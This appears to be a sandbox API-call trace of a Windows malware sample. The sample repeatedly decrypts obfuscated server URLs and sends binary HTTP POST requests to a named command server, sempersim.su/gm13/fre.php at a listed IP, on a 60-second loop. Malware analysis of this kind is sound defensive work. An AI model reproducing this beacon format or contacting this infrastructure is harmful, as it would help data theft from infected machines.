[0110.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0110.461] GetProcessHeap () returned 0x620000 [0110.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0110.462] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0110.463] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0110.463] GetProcessHeap () returned 0x620000 [0110.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x635b58 [0110.463] GetProcessHeap () returned 0x620000 [0110.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0110.464] GetProcessHeap () returned 0x620000 [0110.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643170 [0110.464] GetProcessHeap () returned 0x620000 [0110.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0110.465] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0110.466] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0110.466] GetProcessHeap () returned 0x620000 [0110.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x635c10 [0110.466] GetProcessHeap () returned 0x620000 [0110.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0110.466] send (s=0x2a0, buf=0x635c10*, len=237, flags=0) returned 237 [0110.467] send (s=0x2a0, buf=0x6421e0*, len=159, flags=0) returned 159 [0110.467] GetProcessHeap () returned 0x620000 [0110.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0110.467] recv (in: s=0x2a0, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0111.735] GetProcessHeap () returned 0x620000 [0111.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635c10 | out: hHeap=0x620000) returned 1 [0111.735] GetProcessHeap () returned 0x620000 [0111.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643170 | out: hHeap=0x620000) returned 1 [0111.736] GetProcessHeap () returned 0x620000 [0111.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0111.736] GetProcessHeap () returned 0x620000 [0111.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0111.736] closesocket (s=0x2a0) returned 0 [0111.737] GetProcessHeap () returned 0x620000 [0111.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b500 | out: hHeap=0x620000) returned 1 [0111.737] GetProcessHeap () returned 0x620000 [0111.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636288 | out: hHeap=0x620000) returned 1 [0111.737] GetProcessHeap () returned 0x620000 [0111.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643368 | out: hHeap=0x620000) returned 1 [0111.737] GetProcessHeap () returned 0x620000 [0111.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633340 | out: hHeap=0x620000) returned 1 [0111.738] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1244) returned 0x2a0 [0111.739] Sleep (dwMilliseconds=0xea60) [0111.745] GetProcessHeap () returned 0x620000 [0111.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642fc0 [0111.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0111.746] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0111.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0111.752] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0111.759] GetProcessHeap () returned 0x620000 [0111.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0111.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0111.764] CryptImportKey (in: hProv=0x63b7e8, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0111.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0111.765] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0111.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0111.766] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0111.766] GetProcessHeap () returned 0x620000 [0111.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0111.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0111.767] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642fc0, pdwDataLen=0x19fcfc | out: pbData=0x642fc0, pdwDataLen=0x19fcfc) returned 1 [0111.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0111.768] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0111.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0111.769] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0111.769] GetProcessHeap () returned 0x620000 [0111.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0111.770] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0111.770] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0111.771] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0111.771] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0111.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0111.772] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0111.773] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0111.773] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0111.773] GetProcessHeap () returned 0x620000 [0111.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0111.773] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0111.774] GetProcessHeap () returned 0x620000 [0111.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0111.774] GetProcessHeap () returned 0x620000 [0111.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0111.774] GetProcessHeap () returned 0x620000 [0111.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642fc0 | out: hHeap=0x620000) returned 1 [0111.775] GetProcessHeap () returned 0x620000 [0111.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6434d0 [0111.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0111.792] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0111.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0111.798] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0111.805] GetProcessHeap () returned 0x620000 [0111.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0111.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0111.809] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0111.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0111.811] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0111.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0111.812] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0111.812] GetProcessHeap () returned 0x620000 [0111.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0111.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0111.813] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6434d0, pdwDataLen=0x19fcfc | out: pbData=0x6434d0, pdwDataLen=0x19fcfc) returned 1 [0111.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0111.814] CryptDestroyKey (hKey=0x62d190) returned 1 [0111.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0111.815] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0111.815] GetProcessHeap () returned 0x620000 [0111.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0111.816] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0111.816] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0111.817] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0111.817] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0111.818] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0111.818] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0111.818] GetProcessHeap () returned 0x620000 [0111.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0111.818] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c050*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0111.820] GetProcessHeap () returned 0x620000 [0111.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b570 [0111.820] socket (af=2, type=1, protocol=6) returned 0x2a4 [0111.820] connect (s=0x2a4, name=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0111.871] FreeAddrInfoW (pAddrInfo=0x63c050*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0111.871] GetProcessHeap () returned 0x620000 [0111.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0111.871] GetProcessHeap () returned 0x620000 [0111.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0111.872] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0111.873] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0111.873] GetProcessHeap () returned 0x620000 [0111.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x636288 [0111.873] GetProcessHeap () returned 0x620000 [0111.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0111.873] GetProcessHeap () returned 0x620000 [0111.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642ea0 [0111.874] GetProcessHeap () returned 0x620000 [0111.874] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0111.874] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0111.875] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0111.875] GetProcessHeap () returned 0x620000 [0111.875] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x636340 [0111.875] GetProcessHeap () returned 0x620000 [0111.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0111.876] send (s=0x2a4, buf=0x636340*, len=237, flags=0) returned 237 [0111.876] send (s=0x2a4, buf=0x6421e0*, len=159, flags=0) returned 159 [0111.876] GetProcessHeap () returned 0x620000 [0111.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0111.876] recv (in: s=0x2a4, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0113.693] GetProcessHeap () returned 0x620000 [0113.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636340 | out: hHeap=0x620000) returned 1 [0113.694] GetProcessHeap () returned 0x620000 [0113.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642ea0 | out: hHeap=0x620000) returned 1 [0113.694] GetProcessHeap () returned 0x620000 [0113.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636288 | out: hHeap=0x620000) returned 1 [0113.694] GetProcessHeap () returned 0x620000 [0113.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0113.695] closesocket (s=0x2a4) returned 0 [0113.695] GetProcessHeap () returned 0x620000 [0113.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b570 | out: hHeap=0x620000) returned 1 [0113.695] GetProcessHeap () returned 0x620000 [0113.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0113.696] GetProcessHeap () returned 0x620000 [0113.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6434d0 | out: hHeap=0x620000) returned 1 [0113.696] GetProcessHeap () returned 0x620000 [0113.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0113.697] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1260) returned 0x2a4 [0113.698] Sleep (dwMilliseconds=0xea60) [0113.714] GetProcessHeap () returned 0x620000 [0113.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643200 [0113.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0113.715] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0113.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0113.721] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0113.731] GetProcessHeap () returned 0x620000 [0113.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0113.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0113.732] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0113.733] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0113.733] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0113.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0113.734] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0113.734] GetProcessHeap () returned 0x620000 [0113.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0113.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0113.737] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643200, pdwDataLen=0x19fcfc | out: pbData=0x643200, pdwDataLen=0x19fcfc) returned 1 [0113.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0113.739] CryptDestroyKey (hKey=0x62d190) returned 1 [0113.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0113.740] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0113.740] GetProcessHeap () returned 0x620000 [0113.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0113.741] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0113.741] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0113.742] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0113.743] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0113.743] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0113.744] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0113.748] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0113.749] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0113.749] GetProcessHeap () returned 0x620000 [0113.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0113.749] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0113.749] GetProcessHeap () returned 0x620000 [0113.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0113.749] GetProcessHeap () returned 0x620000 [0113.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0113.750] GetProcessHeap () returned 0x620000 [0113.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643200 | out: hHeap=0x620000) returned 1 [0113.750] GetProcessHeap () returned 0x620000 [0113.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643098 [0113.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0113.751] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0113.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0113.756] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba90) returned 1 [0113.764] GetProcessHeap () returned 0x620000 [0113.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0113.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0113.765] CryptImportKey (in: hProv=0x63ba90, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0113.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0113.766] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0113.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0113.766] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0113.766] GetProcessHeap () returned 0x620000 [0113.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0113.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0113.768] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643098, pdwDataLen=0x19fcfc | out: pbData=0x643098, pdwDataLen=0x19fcfc) returned 1 [0113.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0113.768] CryptDestroyKey (hKey=0x62d710) returned 1 [0113.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0113.769] CryptReleaseContext (hProv=0x63ba90, dwFlags=0x0) returned 1 [0113.769] GetProcessHeap () returned 0x620000 [0113.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0113.770] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0113.770] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0113.771] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0113.771] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0113.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0113.772] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0113.772] GetProcessHeap () returned 0x620000 [0113.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0113.772] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c3e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0113.773] GetProcessHeap () returned 0x620000 [0113.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5d0 [0113.773] socket (af=2, type=1, protocol=6) returned 0x2a8 [0113.774] connect (s=0x2a8, name=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0113.828] FreeAddrInfoW (pAddrInfo=0x63c3e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0113.828] GetProcessHeap () returned 0x620000 [0113.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0113.828] GetProcessHeap () returned 0x620000 [0113.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0113.829] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0113.830] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0113.830] GetProcessHeap () returned 0x620000 [0113.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x636288 [0113.830] GetProcessHeap () returned 0x620000 [0113.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0113.831] GetProcessHeap () returned 0x620000 [0113.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643488 [0113.831] GetProcessHeap () returned 0x620000 [0113.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0113.832] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0113.833] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: 